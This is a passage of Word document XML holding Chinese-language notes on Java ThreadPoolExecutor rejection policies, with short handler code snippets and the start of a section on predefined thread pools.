          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）或者丢弃任务队列中最旧任务（</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DiscardOldestPolicy</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）。丢弃最旧任务也不是简单的丢弃最旧的任务，而是有一些额外的处理。除了丢弃任务还可以直接抛出一个异常（</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RejectedExecutionException</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>），这是比较简单的方式。抛出异常的方式（</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AbortPolicy</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）尽管实现方式比较简单，但是由于抛出一个</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RuntimeException</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，因此会中断调用者的处理过程。除了抛出异常以外还可以不进入线程池执行，在这种方式（</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CallerRunsPolicy</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）中任务将有调用者线程去执行。</w:t>
      </w:r>
      <w:r w:rsidR="00B0747E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00B0747E"/>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="188" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>拒绝策略：</w:t>
      </w:r>
      <w:r w:rsidRPr="009F4B2D">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>当任务源源不断的过来，而我们的系统又处理不过来的时候</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，我们要采取的策略是拒绝服务。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>RejectedExecutionHandler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>接口提供了拒绝任务处理的自定义方法的机会。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ThreadPoolExecutor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中已经包含四种处理策略。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="188" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CallerRunsPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：线程调用运行该任务的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>本身。此策略提供简单的反馈控制机制，能够减缓新任务的提交速度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>public void rejectedExecution(Runnable r, ThreadPoolExecutor e) {  if (!e.isShutdown()) { r.run(); }}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="188" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>这个策略显然不想放弃执行任务。但是由于池中已经没有任何资源了，那么就直接使用调用该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的线程本身来执行。（开始我总不想丢弃任务的执行，但是对某些应用场景来讲，很有可能造成当前线程也被阻塞。如果所有线程都是不能执行的，很可能导致程序没法继续跑了。需要视业务情景而定吧。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="188" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AbortPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：处理程序遭到拒绝将抛出运行时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> RejectedExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>public void rejectedExecution(Runnable r, ThreadPoolExecutor e) {throw new RejectedExecutionException();}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="188" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>这种策略直接抛出异常，丢弃任务。（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>jdk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>默认策略，队列满并线程满时直接拒绝添加新任务，并抛出异常，所以说有时候放弃也是一种勇气，为了保证后续任务的正常进行，丢弃一些也是可以接收的，记得做好记录）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="188" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DiscardPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：不能执行的任务将被删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>public void rejectedExecution(Runnable r, ThreadPoolExecutor e) {}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="188" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>这种策略和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AbortPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>几乎一样，也是丢弃任务，只不过他不抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="188" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DiscardOldestPolicy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>：如果执行程序尚未关闭，则位于工作队列头部的任务将被删除，然后重试执行程序（如果再次失败，则重复此过程）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:wordWrap w:val="0"/>
        <w:rPr>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:t>public void rejectedExecution(Runnable r, ThreadPoolExecutor e) { if (!e.isShutdown()) {e.getQueue().poll();e.execute(r); }}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRDefault="00137373" w:rsidP="00137373">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="188" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>该策略就稍微复杂一些，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>没有关闭的前提下首先丢掉缓存在队列中的最早的任务，然后重新尝试运行该任务。这个策略需要适当小心。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137373" w:rsidRPr="00137373" w:rsidRDefault="00137373" w:rsidP="00B0747E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC6470" w:rsidRDefault="00BC6470" w:rsidP="00BC6470">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>1.3.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>三中预定义线程池</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="00E64E39" w:rsidRDefault="00E64E39" w:rsidP="008632FA">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ExecutorService newFixedThreadPool(int nThreads):</w:t>
      </w:r>
      <w:r w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>固定大小线程池</w:t>
      </w:r>
      <w:r w:rsidR="008632FA" w:rsidRPr="008632FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="宋体" w:hAnsi="Helvetica" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008632FA" w:rsidRPr="00A35FD3" w:rsidRDefault="008632FA" w:rsidP="00A35FD3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="188" w:afterAutospacing="0" w:line="351" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A35FD3">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="252525"/>
          <w:sz w:val="18"/>
